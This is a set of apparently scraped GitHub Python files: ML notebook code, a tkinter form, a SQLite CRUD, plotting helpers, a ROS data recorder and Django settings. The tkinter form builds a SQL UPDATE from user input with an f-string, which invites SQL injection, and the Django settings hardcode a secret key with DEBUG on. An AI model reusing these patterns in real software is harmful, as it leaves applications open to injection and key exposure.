In[21]:\n\n\nyear = pd.DatetimeIndex(df['pickup_datetime']).year\nmonth = pd.DatetimeIndex(df['pickup_datetime']).month\n\nyear = year.astype(str)\nmonth = month.astype(str)\n\n# df['ride_id'] = f'2021/02_' + df.index.astype('str')\n\n\n# In[52]:\n\n\ndf[\"ride_id\"]=df.apply(lambda x: f'{x.pickup_datetime.year}/{x.pickup_datetime.month}_'+str(x.name),axis=1)\n\n\n# In[54]:\n\n\ndf[\"pred\"]=y_pred\n\n\n# In[55]:\n\n\ndf\n\n\n# In[60]:\n\n\ndf[[\"ride_id\",\"pred\"]].to_parquet(\n 'output_file.parquet',\n engine='pyarrow',\n compression=None,\n index=False\n)\n\n\n# In[63]:\n\n\nget_ipython().system(' jupyter nbconvert --to python starter.ipynb')\n\n\n# In[64]:\n\n\nget_ipython().system(' pip install pipenv')\n\n\n# 
Hashes\n\n# \"scikit-learn\": {\n# \"hashes\": [\n# \"sha256:0403ad13f283e27d43b0ad875f187ec7f5d964903d92d1ed06c51439560ecea0\",\n# \"sha256:102f51797cd8944bf44a038d106848ddf2804f2c1edf7aea45fba81a4fdc4d80\",\n# \"sha256:22145b60fef02e597a8e7f061ebc7c51739215f11ce7fcd2ca9af22c31aa9f86\",\n# \"sha256:33cf061ed0b79d647a3e4c3f6c52c412172836718a7cd4d11c1318d083300133\",\n\n# In[ ]:\n\n\n\n\n","repo_name":"murathansygl/MLOpsZoomCamp","sub_path":"starter.py","file_name":"starter.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15812238048","text":"from multiprocessing import JoinableQueue, Process\n\nfrom ojo.workers import rar\n\nfrom ojo.config import config\n\nif __name__ == \"__main__\":\n print(\"START\")\n if not rar.is_installed():\n print(\"RAR is not installed on system! \")\n exit(-1)\n\n work_q = JoinableQueue()\n done_q = JoinableQueue()\n error_q = JoinableQueue()\n\n this_config = config.load()\n ps = [\n Process(\n name=\"p-%d\" % i,\n target=rar.rar_worker,\n args=(this_config, \"w-%d\" % i, work_q, done_q, error_q))\n for i in range(3)\n ]\n for p in ps:\n p.daemon = True\n p.start()\n for i in range(10):\n work_q.put(\"job-%d\" % i)\n\n for p in ps:\n work_q.put(None)\n\n for i in range(10):\n print(done_q.get())\n done_q.task_done()\n\n print(\"done q join\")\n done_q.join()\n print(\"work q join\")\n work_q.join()\n print(\"error q join\")\n error_q.join()\n\n for p in ps:\n print(\"process join\")\n p.join(1)\n print(\"joined\")\n","repo_name":"ofreshy/ojo","sub_path":"ojo/app/rar_checker.py","file_name":"rar_checker.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18178041935","text":"\"\"\"\ninput :\n4 1\n\noutput :\n5\n\"\"\"\n\nimport sys\n\nsys.stdin = open(\"input.txt\", \"r\")\ninput = sys.stdin.readline\nMOD = 10**9 + 7\n\nHIGH, S = map(int, input().rstrip().split())\ndp = [0 for _ in range(HIGH + 5)]\ndp[1] = 1\ndp[2] = 1\ndp[3] = 2\ndp[4] = 4\nfor i in range(3, HIGH + 1):\n if i % 2 == 1:\n dp[i] = 2 * dp[i - 1] + 1\n else:\n dp[i] = dp[i - 2] + 4 ** (i // 2 - 1)\n\nif HIGH % 2 != S % 2:\n print(dp[HIGH] % MOD)\nelse:\n print((dp[HIGH] - 1) % MOD)\n","repo_name":"AlphaTechnic/SOGANG_ICPC_training_day","sub_path":"2021-05-22/21320.py","file_name":"21320.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14478947686","text":"import tkinter as tk\nfrom tkinter import messagebox\nimport ttkbootstrap as ttk\nimport sys\nfrom conexao import Conexao\nsys.path.insert(0, './')\nsys.path.insert(0, './controller')\nfrom controller import usuario\n\nclass MeusDados:\n def __init__(self, master, id_usuario_logado,id):\n self._janela = master\n self.usuario = id_usuario_logado\n self._janela.title('Gestão Fácil/Dados do Usuário')\n self._janela.geometry('800x500')\n self.id = id\n\n self.frame_dados = ttk.Frame(self._janela)\n self.frame_dados.pack(expand=True)\n \n self._lbl_nome_usuario = ttk.Label(self.frame_dados, text='Meus Dados', font='Helvetica 18 bold')\n self._lbl_nome_usuario.grid(row=0, column=1, columnspan=3, pady=20)\n\n nome_label = ttk.Label(self.frame_dados, text=\"Nome:\", width=20)\n nome_label.grid(row=1, column=1, padx=10, pady=5, columnspan=1)\n self.nome_entry = ttk.Entry(self.frame_dados, width=50, bootstyle=\"success-primary\")\n 
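# ttkbootstrap widgets take a bootstyle keyword that selects a themed style\n        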
self.nome_entry.grid(row=2, column=1, columnspan=3, padx=10, pady=5, sticky=\"w\")\n\n email_label = ttk.Label(self.frame_dados, text=\"E-mail:\", width=20)\n email_label.grid(row=3, column=1, padx=10, pady=5, columnspan=1)\n self.email_entry = ttk.Entry(self.frame_dados, width=50, bootstyle=\"success-primary\")\n self.email_entry.grid(row=4, column=1, columnspan=2, padx=10, pady=5, sticky=\"w\")\n\n self.preencher_campos()\n\n atualizar_botao = ttk.Button(self.frame_dados, text=\"Atualizar\", command=self.atualizar_informacoes, width=15, bootstyle=\"success-outline\")\n atualizar_botao.grid(row=5, column=1, pady=10, columnspan=4)\n\n voltar_botao = ttk.Button(self.frame_dados, text=\"Voltar\", command=self.voltar, width=10, bootstyle=\"success-primary\")\n voltar_botao.grid(row=6, column=1, pady=10, columnspan=4)\n\n def preencher_campos(self):\n # Preencha os campos Entry com os dados do usuário\n self.nome_entry.insert(0, self.usuario._nome) # Use _nome aqui\n self.email_entry.insert(0, self.usuario._email)\n\n def atualizar_informacoes(self):\n novo_nome = self.nome_entry.get()\n novo_email = self.email_entry.get()\n sql = f'''UPDATE usuarios SET nome = '{novo_nome}', email = '{novo_email}' WHERE id = {self.id};'''\n Conexao.atualizar(sql)\n messagebox.showinfo('Sucesso',\"Atualização realizada com sucesso!!\")\n\n\n \n def voltar(self):\n self._janela.destroy() # Fecha a janela atual\n\n","repo_name":"sthefanySF/gestao-financeira","sub_path":"view/dadosUsuario.py","file_name":"dadosUsuario.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28923932949","text":"import matplotlib.pyplot as plt\nimport numpy as np\nplt.switch_backend('agg')\nimport seaborn as sns\n\nnum_name = [ 'host_response_rate', 'host_acceptance_rate', 'host_listings_count', 'host_total_listings_count', 'accommodates', 'bedrooms', 'beds', \n'minimum_nights_avg_ntm', 'maximum_nights_avg_ntm', 'availability_30', 'availability_60', 'availability_90', 'availability_365',\n'number_of_reviews', 'number_of_reviews_ltm', 'number_of_reviews_l30d', 'review_scores_rating', 'review_scores_accuracy',\n'review_scores_cleanliness', 'review_scores_checkin', 'review_scores_communication', 'review_scores_location', 'review_scores_value',\n'calculated_host_listings_count', 'calculated_host_listings_count_entire_homes', 'calculated_host_listings_count_private_rooms',\n'reviews_per_month', 'amenities']\ncat_name = ['host_is_superhost', 'neighbourhood_cleansed', 'property_type', 'room_type', 'instant_bookable', \n'bathrooms_text', 'host_identity_verified', 'host_response_time']\n\nclass Visualize:\n def __init__(self):\n pass\n \n def check_num_corr(self,df):\n\n # Check the correlation between numeric variables\n plt.figure(figsize = (20, 20))\n sns.heatmap(df[num_name].corr(), annot = True, cmap=\"YlGnBu\")\n plt.title(\"Correlation Matrix\", fontsize = 30)\n plt.savefig(\"Figure/correlation.png\")\n plt.close()\n # compute the correlation matrix\n corr_matrix = df[num_name].corr()\n\n # find the indices of the highly correlated variables\n high_corr_indices = np.where(abs(corr_matrix) > 0.8)\n\n # print the highly correlated variables\n for i in range(len(high_corr_indices[0])):\n if high_corr_indices[0][i] < high_corr_indices[1][i]:\n print(f\"{df[num_name].columns[high_corr_indices[0][i]]} and {df[num_name].columns[high_corr_indices[1][i]]} are highly correlated with a coefficient of {corr_matrix.iloc[high_corr_indices[0][i], 
high_corr_indices[1][i]]}.\")\n \"\"\"Drop certain columns using 0.8 as threshold\nDrop reviews_per_month because it is highly correlated with numer_of_reviews, number_of_reviews_ltm, number_of_reviews_l30d\n\nDrop calculated_host_listing_count because it is highly correlated with calculated_host_listing_count_private_homes\n\nDrop beds and bedroom because they are highly correlated with accommodates\n\nDrop availability_60 and availability_90.\n\nreview_scores_rating, review_scores_accuracy\"\"\"\n\n\n def distri_num_col(self,df):\n # Visualize using scatter plot and box plot\n df_num_name = df[num_name]\n for col in num_name:\n # Box plot\n sns.histplot(x=col, data=df_num_name)\n plt.title(f'{col.capitalize()} vs Price')\n plt.savefig(f\"Figure/distribution_num_col/col_{col}.png\")\n plt.close()\n \n \n \n def visual_num_col(self,df):\n # Visualize using scatter plot and box plot\n df_num_name = df[num_name + ['price']]\n for col in num_name:\n # Box plot\n sns.scatterplot(x=col, y='price', data=df_num_name)\n plt.title(f'{col.capitalize()} vs Price')\n plt.savefig(f\"Figure/corr_num_col/col_{col}.png\")\n plt.close()\n \n\n def visual_cat_col(self,df):\n # Create a new dataframe with only the selected columns\n df_cat_name = df[cat_name + ['price']]\n\n # Visualize using scatter plot and box plot\n for col in cat_name:\n # Box plot\n sns.boxplot(x=col, y='price', data=df_cat_name)\n plt.xticks(rotation=90)\n plt.title(f'{col.capitalize()} vs Price')\n plt.savefig(f\"Figure/corr_cat_col/col_{col}.png\")\n plt.close()","repo_name":"joew75123/DATA240-Project","sub_path":"Visualize.py","file_name":"Visualize.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25385805475","text":"import sqlite3\nfrom sqlite3 import Error\n\ndef select_all():\n sql=\"SELECT * from tb_livro\"\n try:\n cur.execute(sql)\n registros = cur.fetchall()\n print(\"Consultando todos: \")\n for elemento in registros:\n print(elemento)\n print(\"Total de registros: \", len(registros))\n except Error as e:\n print('Mensagem de erro do select_all:')\n print(e)\n\ndef insert_one():\n sql=\"insert into tb_livro(titulo, autor, preco, ano) values(?, ?, ?, ?)\"\n p_titulo = input(\"Título: \")\n p_autor = input(\"Autor: \")\n p_preco = input(\"Preço: \")\n p_ano = input(\"Ano [aaaa/mm/dd]: \")\n try:\n cur.execute(sql, (p_titulo, p_autor, p_preco, p_ano))\n conexao.commit()\n print(\"One record added successfully\")\n except Error as e:\n print('Mensagem de erro no insert_one:')\n print(e)\n conexao.rollback()\n\ndef update_one():\n sql=\"update tb_livro set autor=? 
where titulo=?\"\n autor = input(\"Novo autor: \")\n p_titulo = input(\"Título: \")\n try:\n cur.execute(sql, (autor, p_titulo))\n conexao.commit()\n except Error as e:\n print('Mensagem de erro no update_one: ')\n print(e)\n conexao.rollback()\n\ndef delete_one():\n sql=\"delete from tb_livro where titulo=?\"\n try:\n n=input(\"Título da exclusão: \")\n cur.execute(sql,(n,))\n conexao.commit()\n except Error as e:\n print(\"Mensagem de erro no delete_one\")\n print(e)\n conexao.rollback()\n\nif __name__ == '__main__':\n database = 'livros.db'\n conexao=sqlite3.connect(database)\n try:\n cur = conexao.cursor()\n cur.execute('''create table if not exists tb_livro(\n pk_idt integer primary key autoincrement,\n titulo text not null unique,\n autor text not null,\n preco float,\n ano text)\n ''')\n conexao.commit()\n except Error as e:\n print('Mensagem de erro no main: ')\n print(e)\n conexao.rollback()\n cur.close()\n conexao.close()\n exit(0)\n while True:\n opcao = int(\n input(\"[1] insert one\\n[2] select all\\n[3] update one\\n[4] delete one\\n[5] select one\\n[6] drop table \\n[0] sair\\nopção: \"))\n if opcao == 1:\n insert_one()\n elif opcao == 2:\n select_all()\n elif opcao == 3:\n update_one()\n elif opcao == 4:\n delete_one()\n elif opcao == 6:\n cur.execute('drop table tb_livro')\n print(\"Drop table....\")\n break","repo_name":"manot13/Python","sub_path":"CRUDlivrariaComSQL.py","file_name":"CRUDlivrariaComSQL.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69922148947","text":"#!/usr/bin/env python3\n\n# general packages\nfrom math import nan\nfrom threading import current_thread\nimport time\nimport numpy as np\nimport csv\nimport os\nimport sys\nimport math\nimport re\nfrom rosgraph_msgs.msg import Clock\nfrom rospy.core import traceback\nimport rostopic\nimport rospkg\nimport subprocess\nfrom datetime import datetime\nimport rosparam\nimport yaml\n\n# ros packages\nimport rospy\nfrom std_msgs.msg import Int16\nfrom geometry_msgs.msg import Pose2D, Pose, PoseWithCovarianceStamped\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\nfrom nav_msgs.msg import Odometry\n\n# for transformations\nfrom tf.transformations import euler_from_quaternion\n\n\nclass DataCollector:\n def __init__(self, topic):\n topic_callbacks = [\n (\"scan\", self.laserscan_callback),\n (\"odom\", self.odometry_callback),\n (\"cmd_vel\", self.action_callback),\n ]\n\n try:\n callback = lambda msg: [t[1] for t in topic_callbacks if t[0] == topic[1]][0](msg)\n except:\n traceback.print_exc()\n return\n\n self.full_topic_name = topic[1]\n self.data = None\n\n print(topic[0])\n\n self.subscriber = rospy.Subscriber(topic[0], topic[2], callback)\n\n def episode_callback(self, msg_scenario_reset):\n print(msg_scenario_reset)\n \n self.data = msg_scenario_reset.data\n\n def laserscan_callback(self, msg_laserscan: LaserScan):\n self.data = [msg_laserscan.range_max if math.isnan(val) else round(val, 3) for val in msg_laserscan.ranges]\n\n def odometry_callback(self, msg_odometry: Odometry):\n pose3d = msg_odometry.pose.pose\n twist = msg_odometry.twist.twist\n\n self.data = {\n \"position\": [\n round(val, 3) for val in [\n pose3d.position.x,\n pose3d.position.y,\n euler_from_quaternion(\n [\n pose3d.orientation.x, \n pose3d.orientation.y,\n pose3d.orientation.z,\n pose3d.orientation.w\n ]\n )[2]\n ]\n ],\n \"velocity\": [\n round(val, 3) for val in [\n twist.linear.x,\n 
twist.linear.y,\n twist.angular.z\n ]\n ]\n }\n\n def action_callback(self, msg_action: Twist): # variables will be written to csv whenever an action is published\n self.data = [\n round(val, 3) for val in [\n msg_action.linear.x,\n msg_action.linear.y,\n msg_action.angular.z\n ]\n ]\n\n def get_data(self):\n return (\n self.full_topic_name,\n self.data \n )\n\n\nclass Recorder:\n def __init__(self):\n self.model = rospy.get_param(os.path.join(rospy.get_namespace(), \"model\"), \"\")\n\n self.dir = rospkg.RosPack().get_path(\"arena-evaluation\")\n self.result_dir = os.path.join(self.dir, \"data\", datetime.now().strftime(\"%d-%m-%Y_%H-%M-%S\")) + \"_\" + rospy.get_namespace().replace(\"/\", \"\")\n\n try:\n os.mkdir(self.result_dir)\n except:\n pass\n \n self.write_params()\n\n topics_to_monitor = self.get_topics_to_monitor()\n\n topics = rostopic.get_topic_list()\n published_topics = topics[0]\n\n topic_matcher = re.compile(f\"{rospy.get_namespace()}({'|'.join([t[0] for t in topics_to_monitor])})$\")\n\n topics_to_sub = []\n\n for t in published_topics:\n topic_name = t[0]\n\n match = re.search(topic_matcher, topic_name)\n\n if not match: \n continue\n\n print(match, t, topic_matcher, match.group())\n\n topics_to_sub.append([topic_name, *self.get_class_for_topic_name(topic_name)])\n\n # topics_to_sub.append([topic_name, *[t for t in topics_to_monitor if t[0] == match.group()][0]])\n\n self.data_collectors = []\n\n for topic in topics_to_sub:\n self.data_collectors.append(DataCollector(topic))\n self.write_data(\n topic[1], [\n \"time\", \"data\"\n ],\n mode=\"w\"\n )\n\n self.write_data(\"episode\", [\"time\", \"episode\"], mode=\"w\")\n self.write_data(\"start_goal\", [\"episode\", \"start\", \"goal\"], mode=\"w\")\n\n self.current_episode = 0\n\n self.config = self.read_config()\n\n self.clock_sub = rospy.Subscriber(\"/clock\", Clock, self.clock_callback)\n self.scenario_reset_sub = rospy.Subscriber(\"/scenario_reset\", Int16, self.scenario_reset_callback)\n\n self.current_time = None\n\n print(rosparam.print_params(\"\", \"/\"))\n\n def scenario_reset_callback(self, data: Int16):\n self.current_episode = data.data\n\n def clock_callback(self, clock: Clock):\n current_simulation_action_time = clock.clock.secs * 10e9 + clock.clock.nsecs\n\n if not self.current_time:\n self.current_time = current_simulation_action_time\n\n time_diff = (current_simulation_action_time - self.current_time) / 1e6 ## in ms\n\n if time_diff < self.config[\"record_frequency\"]:\n return\n\n self.current_time = current_simulation_action_time\n\n for collector in self.data_collectors:\n topic_name, data = collector.get_data()\n \n self.write_data(topic_name, [self.current_time, data])\n \n self.write_data(\"episode\", [self.current_time, self.current_episode])\n self.write_data(\"start_goal\", [\n self.current_episode, \n rospy.get_param(rospy.get_namespace() + \"start\", [0, 0, 0]), \n rospy.get_param(rospy.get_namespace() + \"goal\", [0, 0, 0])\n ])\n\n def read_config(self):\n with open(self.dir + \"/data_recorder_config.yaml\") as file:\n return yaml.safe_load(file)\n\n def get_class_for_topic_name(self, topic_name):\n if \"/scan\" in topic_name:\n return [\"scan\", LaserScan]\n if \"/odom\" in topic_name:\n return [\"odom\", Odometry]\n if \"/cmd_vel\" in topic_name:\n return [\"cmd_vel\", Twist]\n\n def get_topics_to_monitor(self):\n return [\n (\"scan\", LaserScan),\n (\"scenario_reset\", Int16),\n (\"odom\", Odometry),\n (\"cmd_vel\", Twist)\n ]\n\n def write_data(self, file_name, data, mode=\"a\"):\n with 
open(f\"{self.result_dir}/{file_name}.csv\", mode, newline = \"\") as file:\n writer = csv.writer(file, delimiter = ',')\n writer.writerow(data)\n file.close()\n \n def write_params(self):\n with open(self.result_dir + \"/params.yaml\", \"w\") as file:\n yaml.dump({\n \"model\": self.model,\n \"map_file\": rospy.get_param(\"/map_file\", \"\"),\n \"scenario_file\": rospy.get_param(\"/scenario_file\", \"\"),\n \"local_planner\": rospy.get_param(rospy.get_namespace() + \"local_planner\"),\n \"agent_name\": rospy.get_param(rospy.get_namespace() + \"agent_name\", \"\"),\n \"namespace\": rospy.get_namespace().replace(\"/\", \"\")\n }, file)\n\n\nif __name__==\"__main__\":\n rospy.init_node(\"data_recorder\", anonymous=True) \n\n time.sleep(5) \n\n Recorder()\n\n rospy.spin()\n\n","repo_name":"Arena-Rosnav/arena-evaluation","sub_path":"scripts/data_recorder_node.py","file_name":"data_recorder_node.py","file_ext":"py","file_size_in_byte":7438,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"39737130472","text":"from typing import List, Union\n\nimport numpy as np\nimport tensorflow as tf\n\nimport nn_utils.math_utils as math_utils\nfrom dataflow.illumination_integration.helper import getBilinearFromUv\nfrom nn_utils.math_utils import shape_to_uv, uv_to_direction\n\n\n@tf.function\ndef map_levels_to_samples(\n num_roughness_0: int, num_random_roughness: int, data_levels: List[tf.Tensor],\n):\n # Setup uvs\n env_shape = data_levels[0].shape\n uvs = shape_to_uv(*env_shape[:-1])\n uvs_flat = tf.reshape(uvs, [-1, 2])\n\n total_directions_required = num_roughness_0 + num_random_roughness\n\n if uvs_flat.shape[0] < total_directions_required:\n repeats_required = tf.cast(\n tf.math.ceil(total_directions_required / uvs_flat.shape[0]), tf.int32\n )\n uvs_flat = math_utils.repeat(uvs_flat, repeats_required, 0)\n\n uvs_shuffle = tf.random.shuffle(uvs_flat)\n uvs_random = uvs_shuffle[:total_directions_required]\n\n jitter = tf.random.normal(uvs_random.shape, mean=0.0, stddev=0.3)\n uvs_random = uvs_random + jitter\n\n # Setup roughness\n roughness_random = tf.clip_by_value(\n tf.random.uniform(\n (num_random_roughness, 1), minval=1 / 255, maxval=1 + 1 / 255\n ),\n 0,\n 1,\n )\n\n r0_uvs = uvs_random[:num_roughness_0]\n rnd_uvs = uvs_random[num_roughness_0 : num_roughness_0 + num_random_roughness]\n\n # Get samples\n samples_random = random_uv_roughness_access(data_levels, rnd_uvs, roughness_random)\n\n # Always get r0 samples\n samples_r0 = random_uv_roughness_access(\n data_levels, r0_uvs, tf.zeros_like(r0_uvs[:, :1])\n )\n\n ret = (\n uv_to_direction(r0_uvs),\n samples_r0,\n uv_to_direction(rnd_uvs),\n roughness_random,\n samples_random,\n )\n\n return (\n data_levels,\n *ret,\n )\n\n\n@tf.function\ndef full_map_samples(num_roughness_steps: int, data_levels: List[tf.Tensor]):\n # Setup random roughnesses and get all values\n full_uvs = tf.reshape(shape_to_uv(*data_levels[0].shape[:-1]), (-1, 2))\n\n roughness_steps = np.linspace(0.0, 1.0, num_roughness_steps, dtype=np.float32)[\n :, None\n ] # Add a dimension\n\n # Store the roughness steps\n all_samples = tf.TensorArray(\n tf.float32, size=num_roughness_steps, clear_after_read=True\n )\n\n for i, r in enumerate(roughness_steps): # The dimension is removed in the for loop\n r = math_utils.repeat(\n r[:, None], full_uvs.shape[0], 0\n ) # Add a batch dimension back\n\n samples = random_uv_roughness_access(data_levels, full_uvs, r)\n all_samples = all_samples.write(i, samples) # Write the sample\n\n 
ret = (\n uv_to_direction(full_uvs),\n tf.convert_to_tensor(roughness_steps),\n all_samples.stack(),\n )\n\n return (\n data_levels,\n *ret,\n )\n\n\n@tf.function\ndef random_uv_roughness_access(data_levels, uvs, roughness):\n tf.debugging.assert_shapes(\n [(uvs, (\"S\", 2)), (roughness, (\"S\", 1)),]\n + [(d, (\"H%d\" % i, \"W%d\" % i, 3)) for i, d in enumerate(data_levels)]\n )\n # data_levels: List[H, W, 3]\n # uvs: [S, 2]\n # Roughness: [S, 1]\n\n # Result: [S, 3]\n\n smpl_list = []\n for d in data_levels:\n samples_level = getBilinearFromUv(d[None, ...], uvs[None, ...])[0]\n smpl_list.append(samples_level)\n\n level_samples_batched = tf.stack(smpl_list, 0) # M, S, 3\n\n return interpolate_roughness_levels(level_samples_batched, roughness)\n\n\n@tf.function\ndef interpolate_roughness_levels(samples, roughness):\n tf.debugging.assert_shapes(\n [(samples, (\"M\", \"S\", 3)), (roughness, (\"S\", 1)),]\n )\n\n # Setup the roughness interpolation\n roughness_mip_index = roughness[:, 0] * (samples.shape[0] - 1)\n # S\n lower_mip_index = tf.cast(tf.math.floor(roughness_mip_index), tf.int32)\n upper_mip_index = tf.cast(tf.math.ceil(roughness_mip_index), tf.int32)\n\n # Fetch the lower and upper roughness levels\n rgh_low = tf.gather(\n tf.transpose(samples, [1, 0, 2]), lower_mip_index[..., None], batch_dims=1\n )[:, 0]\n rgh_hgh = tf.gather(\n tf.transpose(samples, [1, 0, 2]), upper_mip_index[..., None], batch_dims=1\n )[:, 0]\n\n tf.debugging.assert_shapes(\n [\n (samples, (\"M\", \"S\", 3)),\n (roughness, (\"S\", 1)),\n (rgh_low, (\"S\", 3)),\n (rgh_hgh, (\"S\", 3)),\n ]\n )\n\n # Start interpolation\n fraction_index = roughness_mip_index - tf.cast(lower_mip_index, tf.float32)\n fraction_index = tf.reshape(fraction_index, roughness.shape)\n\n samples_random = rgh_low * fraction_index + rgh_hgh * (1 - fraction_index)\n return samples_random\n\n\n@tf.function\ndef blend_two_maps(*batch_2_data):\n ret = []\n for b in batch_2_data:\n b0 = b[0]\n b1 = b[1]\n alpha = tf.random.uniform((1,))\n ret.append(alpha * b0 + (1 - alpha) * b1)\n return ret\n\n\n@tf.function\ndef specify_mip_levels_to_fetch(\n dataset: List[Union[List[np.ndarray], np.ndarray]], idxs: List[int]\n):\n random_sampled_targets = dataset[1:]\n ret = []\n for idx in idxs:\n ret.append(dataset[0][idx])\n\n ret.extend(random_sampled_targets)\n\n return (*ret,)\n\n\ndef random_sample_dataflow(\n dataset: List[np.ndarray],\n samples_roughness_0: int,\n samples_random_roughness: int,\n batch_size: int,\n with_blend: bool = False,\n full_l0: bool = False,\n shuffle: bool = True,\n):\n dataset_len = len(dataset[0])\n ds = tf.data.Dataset.from_tensor_slices((*dataset,))\n if shuffle:\n ds = ds.shuffle(dataset_len, reshuffle_each_iteration=True)\n\n if with_blend:\n ds = ds.batch(2, drop_remainder=True)\n ds = ds.map(blend_two_maps)\n ds = ds.repeat(2)\n\n if full_l0:\n ds = ds.map(\n lambda *x: full_map_samples(5, x), num_parallel_calls=tf.data.AUTOTUNE,\n )\n else:\n ds = ds.map(\n lambda *x: map_levels_to_samples(\n samples_roughness_0, samples_random_roughness, x\n ),\n num_parallel_calls=tf.data.AUTOTUNE,\n )\n\n ds = ds.map(lambda *x: specify_mip_levels_to_fetch(x, [0]))\n\n if batch_size > 0:\n ds = ds.batch(batch_size)\n ds = ds.prefetch(5)\n\n return ds\n","repo_name":"cgtuebingen/Neural-PIL","sub_path":"dataflow/illumination_integration/dataflow.py","file_name":"dataflow.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"48"} 
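The interpolate_roughness_levels function in the dataflow.py record above treats roughness as a fractional index into a stack of pre-filtered environment-map levels and linearly blends the two neighbouring levels. Below is a minimal standalone NumPy sketch of that idea; the function name interpolate_levels, the shapes, and the test values are illustrative, not the project's API. One detail worth flagging: the record computes rgh_low * fraction_index + rgh_hgh * (1 - fraction_index), which gives the upper level full weight when the fractional part is zero; the conventional lerp, used below, weights the lower level by 1 - frac.

import numpy as np

def interpolate_levels(samples, roughness):
    # samples: (M, S, 3) per-level RGB samples; roughness: (S,) in [0, 1].
    m = samples.shape[0]
    idx = roughness * (m - 1)              # fractional mip index per sample
    lo = np.floor(idx).astype(int)         # lower (sharper) level
    hi = np.ceil(idx).astype(int)          # upper (blurrier) level
    frac = (idx - lo)[:, None]             # blend weight, shape (S, 1)
    s = np.arange(samples.shape[1])        # one (level, sample) pair per sample
    return samples[lo, s] * (1 - frac) + samples[hi, s] * frac

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    samples = rng.random((5, 4, 3))        # 5 mip levels, 4 samples
    out = interpolate_levels(samples, np.array([0.0, 0.25, 0.5, 1.0]))
    assert np.allclose(out[0], samples[0, 0])    # roughness 0 -> lowest level
    assert np.allclose(out[-1], samples[-1, 3])  # roughness 1 -> last level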
+{"seq_id":"13207753294","text":"\nimport subprocess\n\n# this marks the start of a simple project to get approx ink levels of the default printer (canon pixma)\n# and eventually send this info automatically somewhere useful \n\ncolours = ['Magenta', 'Black', 'Yellow', 'BlackPGBK', 'Cyan']\n\n\ndef get_supply_info():\n\tinfo = (subprocess.check_output([\"./printlev.sh\"]))\n\tinfo_pre = (info.decode())\n\tinfo_str = info_pre.rstrip()\n\tinfo_split = info_str.split(\",\")\n\tpercent_val = map(( lambda x: x + '%'), info_split)\n\t\n\tdict_from_list = dict(zip(colours, percent_val))\n\tfor key, value in dict_from_list.items():\n\t\tprint(key, ' : ', value)\n\n\n\n\n\nif __name__ == \"__main__\":\n get_supply_info()\n","repo_name":"ahavell/useful-scripts","sub_path":"Printers/supply.py","file_name":"supply.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12930271727","text":"#coding:utf-8\nimport os\n\nPROJECT_PATH = os.path.dirname(os.path.abspath(__file__))\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nADMINS = (\n # ('Your Name', 'your_email@example.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': os.path.join(PROJECT_PATH, 'dev.sqlite'), # Or path to database file if using sqlite3.\n 'USER': '',\n 'PASSWORD': '',\n 'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.\n 'PORT': '', # Set to empty string for default.\n }\n}\n\nLOGIN_REDIRECT_URL = '/'\nMAX_ROOMS_COUNT = 5\nMESSAGE_HISTORY_NUMBER = 10\nSPAM_PAUSE = 5 # секунды\nTORNADO_HOST = 'localhost'\nTORNADO_PORT = '8080'\nCHAT_LOG_NAME = os.path.join(PROJECT_PATH, 'chat_debug_log.txt')\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.tz',\n 'django.core.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n 'chat_app.context_processors.tornado_host_port',\n)\n\nALLOWED_HOSTS = []\n\nTIME_ZONE = 'Europe/Moscow W-SU'\n\nLANGUAGE_CODE = 'ru'\n\nSITE_ID = 1\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nMEDIA_ROOT = ''\n\nMEDIA_URL = ''\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(PROJECT_PATH, 'static'),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\nSECRET_KEY = 'qg=&h9j$f$u*%l+7+ikvcsbyy(8w%_3_50fzbf2a5mv5j=x#kx'\n\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 